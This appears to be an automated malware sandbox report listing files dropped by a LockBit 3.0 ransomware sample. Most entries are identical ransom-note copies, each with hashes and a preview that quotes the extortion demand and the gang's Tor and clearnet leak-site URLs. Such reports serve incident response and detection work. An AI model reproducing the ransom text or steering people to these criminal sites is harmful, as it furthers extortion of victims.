                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979511789056825
                Encrypted:false
                SSDEEP:192:6S9GDKPdgCArHjtSqvBJa3kQ1P6AtZ0w2NQ5lYjg0Q4Z0p+x9fo:6Sfirqo+bEMYjII0p+/w
                MD5:D53ADDC0AF06E3B032B347FBED9487A0
                SHA1:7AF911E5C213C84596540E01C2CF0A1CBA51A6E3
                SHA-256:21FD040D8464C67E3690E95FC0E9209F12E3318681722CF3745A15F024863A29
                SHA-512:E03D053D54862F6316A3BC8E88DB0A77CF2256C9E1496D68F06DB32C551A1AB84CA655074742BDBE1261888660FEC83B9E3FD0F63F3E564FF637DD606FD29DD3
                Malicious:false
                Preview:.WL......I..R..Dm#:..k`..i.R.q...2.J..`.B..W83....%....K..|..+...C.(../..S......}o.b...}...P@#.W...9.f...Y..R.a.D....ps3....iC...'.66S....D!.5Z.I.p..._.T..+..g...Y....E.A5 3........l5...hx.Z.iV.....m.WwN:u.q/.].B...L..f...@...5...by5.....B?B....._..'.?.........g.}I....!...(......w.V.!..yH....:...9........2....am.!2.Y....wq...r.`:.Yd.8...`..t?E..N:.....*=`.BIC....\......X.5..*s}.*=..T...z..3d>...q.(.p...D......q=.\...O..P..h..d..w*...cW....mw.u.e.g..i.).........9...e.@".aU.,.U......:.....T4.....Km..N..xO.-..{.7+e.R."....6a....@q.g..b..8...F\........0y.f.E.$....u-..Zl...... .....)p.. /.@..YUg.K6....l.B.Z.).U.......|.......NQf.3..&.F..ROi..I.A....olK...yy#..!....6C.]...r......ZK..!...\..:..=c....Qh...$:.,...PkdU.:...E.K...e.j".~._.....r.......{.C.m.....XqYr...../9..5.p..h..0.....R..b....8..zcKQ.%.f...."...O%......:W.......c..{.D......Ie..U..x.q....UV"[...'d._d.l...i..1..C.3.......l....X....Bp....N..H.W.xp...(.....|..#.vq...t5..5..e...H...u.i..X.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
